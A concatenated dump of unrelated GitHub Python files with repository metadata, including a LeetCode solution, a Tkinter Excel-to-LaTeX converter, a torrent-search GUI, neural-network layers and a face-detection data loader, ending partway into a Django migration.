20d3d2630c7722694a7e49fd13bcf76f6e1258f1 | 79d9719097b479504c0ed814ae1e13a3c466d2d8 | /arrays/general/gas_station.py | 9e17a4a334bbd25fdb3f0993b328a80708a699a7 | [] | no_license | ErickMwazonga/sifu | 70ca45e173c0b9e45e547c9d210fe54df0e9ac51 | 9cc461c6f0183837620c8b2bb02a658771f77e13 | refs/heads/master | 2023-09-01T03:20:19.667944 | 2023-08-31T11:08:20 | 2023-08-31T11:08:20 | 243,814,515 | 34 | 10 | null | null | null | null | UTF-8 | Python | false | false | 1,477 | py | '''
134. Gas Station
Link: https://leetcode.com/problems/gas-station/
There are n gas stations along a circular route, where the amount of gas at the ith station is gas[i].
You have a car with an unlimited gas tank and it costs cost[i] of gas to travel from the ith station to its next (i + 1)th station.
You begin the journey with an empty tank at one of the gas stations.
Given two integer arrays gas and cost, return the starting gas station's index
if you can travel around the circuit once in the clockwise direction, otherwise return -1.
If there exists a solution, it is guaranteed to be unique
Example:
Input: gas = [1, 2, 3, 4, 5], cost = [3, 4, 5, 1, 2]
Output: 3
Explanation:
Start at station 3 (index 3) and fill up with 4 unit of gas. Your tank = 0 + 4 = 4
Travel to station 4. Your tank = 4 - 1 + 5 = 8
Travel to station 0. Your tank = 8 - 2 + 1 = 7
Travel to station 1. Your tank = 7 - 3 + 2 = 6
Travel to station 2. Your tank = 6 - 4 + 3 = 5
Travel to station 3. The cost is 5. Your gas is just enough to travel back to station 3.
Therefore, return 3 as the starting index.
'''
def can_complete_circuit(self, gas, cost):
n = len(gas)
for s in range(n):
tank = 0
possible = True
for i in range(s, n + s):
station = i % n
tank += gas[station] - cost[station]
if tank < 0:
possible = False
break
if possible:
return s
return -1
| [
"emwazonga@microsoft.com"
] | emwazonga@microsoft.com |
59ace92504ab327c25eabe6c70872dbd2485e32e | e1228380bdebcb3cfab514d3b556ac97a424584e | /venv/bin/jupyter-run | db2bc5800da3c1752288e5b6fbc93e190d6ab7ff | [] | no_license | naveenkunareddy/financethroughpython | 62b7f6c1467fece9e245f9f7c0de20d6e9246807 | f55b388932a46e282841745517905ae1c3629720 | refs/heads/master | 2020-03-20T00:53:21.101294 | 2017-12-12T10:17:18 | 2017-12-12T10:17:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | #!/Users/dsr/Documents/HustleProjects/financethroughpython/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.runapp import RunApp
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(RunApp.launch_instance())
| [
"dmitry@rastorguev.co.uk"
] | dmitry@rastorguev.co.uk | |
8f5b9e5815ed9447dbdc3839d88f9081a003ef60 | c462a452ecbb978683f9b55a7863f2ca99050426 | /model.py | 31823da86196d47d7c199cad4c6a55614ffacf8e | [] | no_license | mobileraj/topicModel | b3d1c026e715b6611bde6ab3436c9be0971424cd | 5ac4de351250ebc760a9c4b192eb46d3168b542d | refs/heads/master | 2021-01-10T06:07:14.064524 | 2016-01-01T00:30:07 | 2016-01-01T00:30:07 | 48,590,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from nltk.stem.porter import PorterStemmer
from gensim import corpora, models
import gensim
tokenizer = RegexpTokenizer(r'\w+')
en_stop = get_stop_words('en')
p_stemmer = PorterStemmer()
doc_set=[]
for i in range(1977,2015):
print 'on ',str(i)
with open('/home/raj/projects/topicModels/topics/'+str(i)+'.txt','r') as foo:
doc_set.append(foo.read().replace('\n',''))
texts = []
for i in doc_set:
raw = i.lower()
tokens = tokenizer.tokenize(raw)
stopped_tokens = [i for i in tokens if not i in en_stop]
texts.append(stopped_tokens)
dictionary = corpora.Dictionary(texts)
corpus = [dictionary.doc2bow(text) for text in texts]
ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=10, id2word = dictionary, passes=20)
| [
"schroskat@gmail.com"
] | schroskat@gmail.com |
cec0630d7b02e3552f90a1868e3f887d46ada32c | 141aa0e3cf759234fd3828d662b1de1cf3252c98 | /p2psercher.py | 96ac0e0d183e4d354e6a40ead7f20d70e6c47311 | [] | no_license | somnusx/p2psercher | dcf34288da1337a26d42f8d9b8821b503f2d1c5a | 80d13fcf6af6e8eeb2215374728993de7e23daeb | refs/heads/master | 2021-01-19T04:26:05.612008 | 2016-07-14T10:11:03 | 2016-07-14T10:11:03 | 63,325,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py | import re
import urllib.request
from tkinter import *
master = Tk()
e = Entry(master,width=80)
e.grid(row=0, column=1,padx=5,pady=5)
text = Text(master)
text.grid(row=1, column=1)
def so():
sou = urllib.request.quote(e.get())
url = "http://api-jp02.smartmiu.com:184/s.py/op_search?word="+sou
r = urllib.request.urlopen(url)
s = r.read().decode("UTF-8")
if s.find('<title>') == -1:
text.insert(INSERT,"对你不起客官没有找到您想要的资源")
a = re.findall(r"(?<=<title>).+?(?=</title>)",s)
b = re.findall(r"(?<=<url>).+?(?=</url>)",s)
c = re.findall(r"(?<=<size>).+?(?=</size>)",s)
length1 = len(a)*2
length2 = len(a)*3
r = 1
k = 2
for i in c:
if r<length1:
a.insert(r,i)
r+=2
for i in b:
if k<length2:
a.insert(k,i)
k+=3
for each in range(len(a)):
if each%3 == 0:
text.insert(INSERT, (a[each],a[each+1],"\n",a[each+2],"\n\n"))
#print(a[each],a[each+1],"\n",a[each+2],"\n")
Button(master, text="搜琐", width=5, command=so).grid(row=0, column=2, padx=5, pady=5)
mainloop()
##def show():
##
## print("作品")
##
##c1 = Checkbutton(master,text="成人模式",variable=show)
###c2 = Checkbutton(master, text="帅锅", variable=show)
##c1.grid(row=1,column=2)
###c2.grid(row=1)
| [
"noreply@github.com"
] | noreply@github.com |
dcb8b926b77f0f9e46e7d838300cd7968dd643ba | b8f0b01b2ccbffacb86122558bc6390b2551e83b | /interface.py | 49a02623e20f8218d293380ea9bd3bea95286b9c | [] | no_license | TyeYeah/LaTeXfromExcel | 47e1b88e0a186f100453c4376d1716871e0a0d5d | 782ef5fe741f57e5832464dd10e992ac585d785c | refs/heads/master | 2020-12-12T08:18:42.385056 | 2020-06-27T03:37:42 | 2020-06-27T03:37:42 | 234,088,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,009 | py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
from writeTable import *
from readTable import *
import tkinter as tk
from tkinter import filedialog, dialog, messagebox
import os
file_path = ''
def openfile():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
def outputCSV():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
writeCSV(file_path[0:-4] + '.csv', readCSV(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.csv')
print('write csv successfully')
elif filesuffix.lower() == '.xls':
try:
writeCSV(file_path[0:-4] + '.csv', read03xls(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.csv')
print('write csv successfully')
elif filesuffix.lower() == '.xlsx':
try:
writeCSV(file_path[0:-5] + '.csv', read07xlsx(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.csv')
print('write csv successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def outputXLSX():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
write07xlsx(file_path[0:-4] + '.xlsx', readCSV(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xlsx')
print('write xlsx successfully')
elif filesuffix.lower() == '.xls':
try:
write07xlsx(file_path[0:-4] + '.xlsx', read03xls(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xlsx')
print('write xlsx successfully')
elif filesuffix.lower() == '.xlsx':
try:
write07xlsx(file_path[0:-5] + '.xlsx', read07xlsx(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.xlsx')
print('write xlsx successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def outputXLS():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
write03xls(file_path[0:-4] + '.xls', readCSV(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xls')
print('write xls successfully')
elif filesuffix.lower() == '.xls':
try:
write03xls(file_path[0:-4] + '.xls', read03xls(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.xls')
print('write xls successfully')
elif filesuffix.lower() == '.xlsx':
try:
write03xls(file_path[0:-5] + '.xls', read07xlsx(file_path))
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.xls')
print('write xls successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def outputTEX():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
if file_path == '':
return ''
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
writeLaTeX(file_path[0:-4] + '.tex', readCSV(file_path), 1)
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening csv')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.tex')
print('write tex successfully')
elif filesuffix.lower() == '.xls':
try:
writeLaTeX(file_path[0:-4] + '.tex', read03xls(file_path), 1)
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xls')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-4] + '.tex')
print('write tex successfully')
elif filesuffix.lower() == '.xlsx':
try:
writeLaTeX(file_path[0:-5] + '.tex', read07xlsx(file_path), 1)
except Exception as e:
messagebox.showerror('Something Wrong', 'Error occurred when opening xlsx')
else:
messagebox.showinfo('Info', 'Successfully converted!\nFile saved in \n' + file_path[0:-5] + '.tex')
print('write tex successfully')
else:
messagebox.showerror('Something Wrong',
'Unsopported file suffix!\nOnly ".xls", ".xlsx", ".csv" are permitted')
def mainwindow():
def conversion():
window.destroy()
def backmain():
conversionwin.destroy()
mainwindow()
def nodelwin():
messagebox.showinfo('Tip', 'Press Back to Main to Quit')
return ''
global file_path
file_path = ''
conversionwin = tk.Tk()
conversionwin.title('File Format Conversion')
conversionwin.geometry('500x300')
# conversionwin.protocol("WM_DELETE_WINDOW", nodelwin)
banner = 'Source file should have suffix as csv, xls or xlsx'
txt = tk.Label(conversionwin, text=banner, font=('Arial', 12), width=50, height=4)
txt.pack()
print('Enter conversion')
savexlsbut = tk.Button(conversionwin, text='Convert to XLS', font=('Arial', 12), width=30, height=1,
command=outputXLS)
savexlsbut.pack()
savexlsxbut = tk.Button(conversionwin, text='Convert to XLSX', font=('Arial', 12), width=30, height=1,
command=outputXLSX)
savexlsxbut.pack()
savecsvbut = tk.Button(conversionwin, text='Convert to CSV', font=('Arial', 12), width=30, height=1,
command=outputCSV)
savecsvbut.pack()
savetexbut = tk.Button(conversionwin, text='Convert to TEX', font=('Arial', 12), width=30, height=1,
command=outputTEX)
savetexbut.pack()
backbut = tk.Button(conversionwin, text='Back to Main Menu', font=('Arial', 12), width=30, height=1,
command=backmain)
backbut.pack()
conversionwin.mainloop()
return ''
def outputint():
window.destroy()
def backmain():
outputwin.destroy()
mainwindow()
def nodelwin():
messagebox.showinfo('Tip', 'Press Back to Main to Quit')
return ''
def outputlatex():
global file_path
file_path = filedialog.askopenfilename()
print(file_path)
nonlocal text1
path, suffix = os.path.splitext(file_path)
filesuffix = suffix.strip().lower()
if filesuffix.lower() == '.csv':
try:
text1.delete('1.0', tk.END)
text1.insert('insert', writeLaTeX('./tmptex.tex', readCSV(file_path)))
except Exception as e:
text1.delete('1.0', tk.END)
text1.insert('insert', 'Error occurred when opening csv')
else:
print('read csv successfully')
elif filesuffix.lower() == '.xls':
try:
text1.delete('1.0', tk.END)
text1.insert('insert', writeLaTeX('./tmptex.tex', read03xls(file_path)))
except Exception as e:
text1.delete('1.0', tk.END)
text1.insert('insert', 'Error occurred when opening xls')
else:
print('read xls successfully')
elif filesuffix.lower() == '.xlsx':
try:
text1.delete('1.0', tk.END)
text1.insert('insert', writeLaTeX('./tmptex.tex', read07xlsx(file_path)))
except Exception as e:
text1.delete('1.0', tk.END)
text1.insert('insert', 'Error occurred when opening xlsx')
else:
print('read xlsx successfully')
else:
text1.delete('1.0', tk.END)
text1.insert('insert',
'Unsopported file suffix\nOnly ".xls", ".xlsx", ".csv" are permitted\n' + file_path)
os.remove('./tmptex.tex')
global file_path
file_path = ''
outputwin = tk.Tk()
outputwin.title('Output LaTeX Source')
outputwin.geometry('500x300')
# outputwin.protocol("WM_DELETE_WINDOW", nodelwin)
print('Enter outputfunc')
text1 = tk.Text(outputwin, width=50, height=10, bg='cyan', font=('Arial', 12))
text1.pack()
outbut = tk.Button(outputwin, text='Choose File (xls, xlsx, csv)', font=('Arial', 12), width=30, height=1,
command=outputlatex)
outbut.pack()
backbut = tk.Button(outputwin, text='Back to Main Menu', font=('Arial', 12), width=30, height=1,
command=backmain)
backbut.pack()
outputwin.mainloop()
window = tk.Tk()
window.title('LaTeXfromExcel') # set title
window.geometry('500x300') # set size
banner = 'Convert Excel Data to LaTeX Source'
txt = tk.Label(window, text=banner, font=('Arial', 12), width=30, height=6)
txt.pack()
conbut = tk.Button(window, text='File Format Conversion', font=('Arial', 12), width=30, height=1,
command=conversion)
conbut.pack()
outbut = tk.Button(window, text='Output LaTeX Source', font=('Arial', 12), width=30, height=1, command=outputint)
outbut.pack()
window.mainloop() # show window
if __name__ == '__main__':
mainwindow()
| [
"noreply@github.com"
] | noreply@github.com |
277e031bbe4eb0de0c787b793ee12b9c9d314013 | 554a9b8011f8379a3f66e8f99fab320d604241e2 | /2026_Arvore_de_Natal/2026.py | 9692ef9ee7fd039928d992f64342d3f06c002d90 | [] | no_license | estherhoffmann/URI | e0ada72d3d541e345a7e890f38045635f726747a | a8ac10c3e56b351392b468acd7a0de04dfe72559 | refs/heads/master | 2020-10-01T04:24:58.846666 | 2019-12-12T00:56:38 | 2019-12-12T00:56:38 | 227,454,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,740 | py | # Esther Calderan Hoffmann - RA: 743529
def prog_dinamica_mochila(num_itens, valor_itens, peso_itens, capacidade):
matriz_valores = [[0 for i in range(0, capacidade+1)] for j in range(0, num_itens+1)]
for i in range(1, num_itens+1): #acrescento um item de cada vez
for j in range(0, capacidade+1): #vou aumentando a capacidade
#então para cada aumento de 1 item, vejo se pega ele com todas as possibilidades de capacidade
if j < peso_itens[i-1]:
#se a capacidade for menor que o peso do item não faz
#sentido pega-lo
matriz_valores[i][j] = matriz_valores[i-1][j]
#print("não peguei:", matriz_valores[i][j])
else:
#caso contrário, veja se é melhor aquela capacidade sem o novo item
#ou nao
matriz_valores[i][j] = max(matriz_valores[i-1][j], matriz_valores[i-1][j - peso_itens[i-1]] + valor_itens[i-1])
#print("peguei:", matriz_valores[i][j])
return matriz_valores[num_itens][capacidade]
num_galhos = int(input())
for i in range(0, num_galhos):
num_pacotes = int(input())
qnt_enfeites = [None]*num_pacotes
peso_pacote = [None]*num_pacotes
capacidade_galho = int(input())
for j in range(0, num_pacotes):
qnt_enfeites[j], peso_pacote[j] = input().split()
qnt_enfeites = list(map(int, qnt_enfeites))
peso_pacote = list(map(int, peso_pacote))
num_total = prog_dinamica_mochila(num_pacotes, qnt_enfeites, peso_pacote, capacidade_galho)
num_pacotes = None
capacidade_galho = None
qnt_enfeites = []
peso_pacote = []
print("Galho " + str(i+1) + ":")
print("Numero total de enfeites:", num_total)
print()
| [
"esthercalderan@gmail.com"
] | esthercalderan@gmail.com |
5633baca639401d57b615c992bb2ac1c9d3b7b2f | bf509ac391016e3f0f70e52b7ade9cdead291ef4 | /zock/ns3-book/local/exp04/wscript | 7b2bb10f34d1fab9a57e4553e3994512103386a9 | [] | no_license | 8Uchi29/ns3 | 7360f44621f6924166aebf35bd76750948ac8430 | 7bb5e7805b2346c80fd5d854fb921cea784e9765 | refs/heads/master | 2016-08-04T20:12:36.157439 | 2015-02-01T05:11:57 | 2015-02-01T05:11:57 | 29,118,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | ## -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-
def build(bld):
obj = bld.create_ns3_program('exp04-TcpFlowMonitoring',
['core', 'point-to-point', 'point-to-point-layout', 'applications', 'internet', 'flow-monitor'])
obj.source = 'exp04-TcpFlowMonitoring.cc'
obj = bld.create_ns3_program('exp04-UdpFlowMonitoring',
['core', 'point-to-point', 'point-to-point-layout', 'applications', 'internet', 'flow-monitor'])
obj.source = 'exp04-UdpFlowMonitoring.cc'
| [
"ryo@crunchbang.(none)"
] | ryo@crunchbang.(none) | |
bcfcfae6effa7e2b3cfddb5ad1e2af7d4f40caa6 | 09d564aaab98f72dce6585e78a0642c9fe3539f4 | /日常练习/python_exercise_20181124.py | 77a1eb50c86981a2e63439c1aafb739e42afc032 | [] | no_license | everydayxy/xy_py | 4b983b4bccc843602f1ea0b1d5ea9576119604bf | 08b314e7ecb10e13394aa93b92084c53596834f3 | refs/heads/master | 2020-04-03T08:52:44.729729 | 2019-09-20T15:05:35 | 2019-09-20T15:05:35 | 134,683,779 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | # def aaa(n):
# count = len(str(n))
# w = 10 ** (count-1)
# for _ in range(count):
# print(n // w)
# n %= w
# w //= 10
#
# num = int(input('输入一个数字: '))
# aaa(num)
# #输入一个数字,打印最大值
# max1 = -100000000000000000000
# while True:
# try:
# num = int(input('请输入一个数字:'))
# if num > max1:
# max1 = num
# end = input('输入数字结束了吗??【y/n|Y/N】')
# if end == 'y' or end == 'Y':
# print('最大值为:', max1)
# break
# except ValueError:
# print('检测到非法字符,请重新输入')
# break
for i in range(1,10):
s = ''
for j in range(1,i+1):
s += '{}*{}={:<4}'.format(j,i,j*i)
print(s) | [
"everydayx@163.com"
] | everydayx@163.com |
c28b69ee8ef4c7d7151653ef49a31bbed3d90abb | 87fa4da0be382087b9c950f3a56c95e8401519df | /codes/layers.py | 2025a0998f1f28a6c288fd1a83c8a2d99af04d53 | [] | no_license | AmadeusChan/CNNOnMNIST | 713f10f97db99842f28d0315cb5c6d2d1c544581 | 0f9687336ac6f9f6af5b86f4a007ecf1c8a38de6 | refs/heads/master | 2021-05-08T01:29:05.781955 | 2017-10-25T13:02:07 | 2017-10-25T13:02:07 | 107,856,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,545 | py | import numpy as np
from functions import conv2d_forward, conv2d_backward, avgpool2d_forward, avgpool2d_backward
class Layer(object):
def __init__(self, name, trainable=False):
self.name = name
self.trainable = trainable
self._saved_tensor = None
def forward(self, input):
pass
def backward(self, grad_output):
pass
def update(self, config):
pass
def _saved_for_backward(self, tensor):
self._saved_tensor = tensor
class Relu(Layer):
def __init__(self, name):
super(Relu, self).__init__(name)
self.output = np.ndarray(1)
def forward(self, input):
self._saved_for_backward(input)
self.output = np.maximum(0, input)
return self.output
def backward(self, grad_output):
input = self._saved_tensor
return grad_output * (input > 0)
class Sigmoid(Layer):
def __init__(self, name):
super(Sigmoid, self).__init__(name)
def forward(self, input):
output = 1 / (1 + np.exp(-input))
self._saved_for_backward(output)
return output
def backward(self, grad_output):
output = self._saved_tensor
return grad_output * output * (1 - output)
class Linear(Layer):
def __init__(self, name, in_num, out_num, init_std):
super(Linear, self).__init__(name, trainable=True)
self.in_num = in_num
self.out_num = out_num
self.W = np.random.randn(in_num, out_num) * init_std
self.b = np.zeros(out_num)
self.grad_W = np.zeros((in_num, out_num))
self.grad_b = np.zeros(out_num)
self.diff_W = np.zeros((in_num, out_num))
self.diff_b = np.zeros(out_num)
def forward(self, input):
self._saved_for_backward(input)
output = np.dot(input, self.W) + self.b
return output
def backward(self, grad_output):
input = self._saved_tensor
self.grad_W = np.dot(input.T, grad_output)
self.grad_b = np.sum(grad_output, axis=0)
return np.dot(grad_output, self.W.T)
def update(self, config):
mm = config['momentum']
lr = config['learning_rate']
wd = config['weight_decay']
self.diff_W = mm * self.diff_W + (self.grad_W + wd * self.W)
self.W = self.W - lr * self.diff_W
self.diff_b = mm * self.diff_b + (self.grad_b + wd * self.b)
self.b = self.b - lr * self.diff_b
class Reshape(Layer):
def __init__(self, name, new_shape):
super(Reshape, self).__init__(name)
self.new_shape = new_shape
def forward(self, input):
self._saved_for_backward(input)
return input.reshape(*self.new_shape)
def backward(self, grad_output):
input = self._saved_tensor
return grad_output.reshape(*input.shape)
class Conv2D(Layer):
def __init__(self, name, in_channel, out_channel, kernel_size, pad, init_std):
super(Conv2D, self).__init__(name, trainable=True)
self.kernel_size = kernel_size
self.pad = pad
self.W = np.random.randn(out_channel, in_channel, kernel_size, kernel_size) * init_std
self.b = np.zeros(out_channel)
self.diff_W = np.zeros(self.W.shape)
self.diff_b = np.zeros(out_channel)
def forward(self, input):
self._saved_for_backward(input)
output = conv2d_forward(input, self.W, self.b, self.kernel_size, self.pad)
return output
def backward(self, grad_output):
input = self._saved_tensor
grad_input, self.grad_W, self.grad_b = conv2d_backward(input, grad_output, self.W, self.b, self.kernel_size, self.pad)
return grad_input
def update(self, config):
mm = config['momentum']
lr = config['learning_rate']
wd = config['weight_decay']
self.diff_W = mm * self.diff_W + (self.grad_W + wd * self.W)
self.W = self.W - lr * self.diff_W
self.diff_b = mm * self.diff_b + (self.grad_b + wd * self.b)
self.b = self.b - lr * self.diff_b
class AvgPool2D(Layer):
def __init__(self, name, kernel_size, pad):
super(AvgPool2D, self).__init__(name)
self.kernel_size = kernel_size
self.pad = pad
def forward(self, input):
self._saved_for_backward(input)
output = avgpool2d_forward(input, self.kernel_size, self.pad)
return output
def backward(self, grad_output):
input = self._saved_tensor
grad_input = avgpool2d_backward(input, grad_output, self.kernel_size, self.pad)
return grad_input
| [
"greenclouds@foxmail.com"
] | greenclouds@foxmail.com |
6cc1e406d5e8c860b574719a113a6b490feddbd8 | 68359ee23312e47f18399b3e95b9dc9bb02c1a51 | /utils/my_data_loader.py | e458fce94f553626d380abd0c62ca77fe43d6ecb | [] | no_license | RoyceMao/DSFD | 6504de2e47e263a5e93f4f8ef957a3059581a1c9 | 1c6584f87aa5371fff0b6af2d7ad5d01919810f1 | refs/heads/master | 2020-05-30T06:04:12.879937 | 2019-11-26T06:32:50 | 2019-11-26T06:32:50 | 189,571,395 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,612 | py | # -*- coding:utf-8 -*-
"""
File Name: my_data_loader.py
Description : 数据加载
Author : royce.mao
date: 2019/06/13
"""
import torch
import random
import traceback
import numpy as np
import skimage
import math
from PIL import Image
from skimage import io
from torch.utils.data import Dataset
from utils.augment import Augmentation
from utils.augmentation import data_aug
from utils.my_np_utils import clip_boxes
class WIDERFace(Dataset):
def __init__(self, gen_file, mode='train'):
"""
:param gen_file: 数据准备生成的list file
:param mode: train or val
"""
super(WIDERFace, self).__init__()
self.mode = mode
self.fnames = []
self.gts = []
self.labels = []
self.to_aug = Augmentation(640)
# 按行读取,.split()之后保留的是[path, face_num, face_loc]的顺序
with open(gen_file) as f:
lines = f.readlines()
for line in lines:
line = line.strip().split()
face_num = int(line[1])
gt = []
label = []
# 单张图片的人头,保留人头位置信息与人头标签信息
for i in range(face_num):
x = float(line[2 + 5 * i])
y = float(line[3 + 5 * i])
w = float(line[4 + 5 * i])
h = float(line[5 + 5 * i])
cls = int(line[6 + 5 * i])
gt.append([x, y, x + w - 1, y + h - 1])
label.append(cls)
# generator汇总
if len(gt) > 0:
self.fnames.append(line[0]) # len = num_samples
self.gts.append(gt) # len = num_samples
self.labels.append(label) # len = num_samples
# 训练样本的数量
self.num_samples = len(self.fnames)
def __getitem__(self, index):
"""
训练与测试阶段的按索引数据加载
:param index:
:return:
"""
while True:
# 读取指定index的img
image_path = self.fnames[index]
# img = io.imread(image_path)
# if img.ndim != 3:
# img = skimage.color.gray2rgb(img)
# img_height, img_width, _ = img.shape
img = Image.open(image_path)
if img.mode == 'L':
img = img.convert('RGB')
img_width, img_height = img.size
# 指定index的img的face_loc的坐标归一化处理
gt_box = np.array(self.gts[index])
gt_box[:, 0] = gt_box[:, 0] / img_width
gt_box[:, 1] = gt_box[:, 1] / img_height
gt_box[:, 2] = (gt_box[:, 2] + gt_box[:, 0]) / img_width
gt_box[:, 3] = (gt_box[:, 3] + gt_box[:, 1]) / img_height
# 指定index的img的face_label提取
gt_label = np.array(self.labels[index])
# 拼接后转list [face_num, (cls,x1,y1,x2,y2)]
gt_box_label = np.hstack((gt_label[:, np.newaxis], gt_box)).tolist()
# 做数据增广
try:
img, sample_box_label = data_aug(img, gt_box_label, self.mode, image_path)
# img, boxes, labels = self.to_aug(img, gt_box, gt_label)
## IMG 通道first
# if len(img.shape) == 3:
# img = np.swapaxes(img, 1, 2)
# img = np.swapaxes(img, 1, 0)
## BOX 坐标归一化处理
# boxes = boxes / 640
# sample_box_label = np.hstack((labels[:, np.newaxis], boxes))
# 数据增广后的[face_num, (cls,x1,y1,x2,y2)]标签转[face_num, (x1,y1,x2,y2,cls)]
if len(sample_box_label) > 0:
target = clip_boxes(sample_box_label, 1)
# target = np.hstack((sample_box_label[:, 1:], sample_box_label[:, 0][:, np.newaxis]))
assert (target[:, 2] > target[:, 0]).any()
assert (target[:, 3] > target[:, 1]).any()
assert not np.any(np.isnan(target))
assert not np.any(np.isnan(img))
assert not np.any(np.isinf(target))
assert not np.any(np.isinf(img))
break # 只有提取到有人头目标的图片(img,target)时,才加载当作训练样本。否则,一直随机加载
else:
index = random.randrange(0, self.num_samples)
continue
except Exception as e:
traceback.print_exc()
index = random.randrange(0, self.num_samples)
continue
# print(target)
return torch.from_numpy(img), target
def __len__(self):
return self.num_samples
def face_collate(batch):
"""
一个batch里数据的取样方式
:param batch:
:return:
Custom collate fn for dealing with batches of images that have a different
number of associated object annotations (bounding boxes).
Arguments:
batch: (tuple) A tuple of tensor images and lists of annotations
Return:
A tuple containing:
1) (tensor) batch of images stacked on their 0 dim
2) (list of tensors) annotations for a given image are stacked on
0 dim
"""
targets = []
imgs = []
for sample in batch:
imgs.append(sample[0])
targets.append(torch.FloatTensor(sample[1]))
return torch.stack(imgs, 0), targets
| [
"563422264@qq.com"
] | 563422264@qq.com |
10a39d56ddb328c6d322c5856d31a5d373aa2ed8 | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_ConstantTrend_Seasonal_DayOfWeek_LSTM.py | d3d6f857ae0191e4610ab1abbda44e021c1aa868 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 175 | py | import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['RelativeDifference'] , ['ConstantTrend'] , ['Seasonal_DayOfWeek'] , ['LSTM'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
263bdb79183e6a8852db732e9fe310df072166bd | b2301365d220ff0295b8beddbed38b0581f9610d | /Django/fs_books_prj/apps/books/migrations/0001_initial.py | 1850bb0485a27325ab15bd0c528dafe99ff4abef | [] | no_license | JoA-MoS/Python | db246a5ff2201c6ef1dfb9d9b0fd8a37e1d7c46d | 4547c2667f3eaf0a001532bb2b103aab3c344fbe | refs/heads/master | 2021-08-16T11:18:20.420868 | 2017-07-21T05:52:18 | 2017-07-21T05:52:18 | 96,125,892 | 0 | 0 | null | 2021-06-10T18:40:09 | 2017-07-03T15:34:52 | Python | UTF-8 | Python | false | false | 676 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-19 19:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
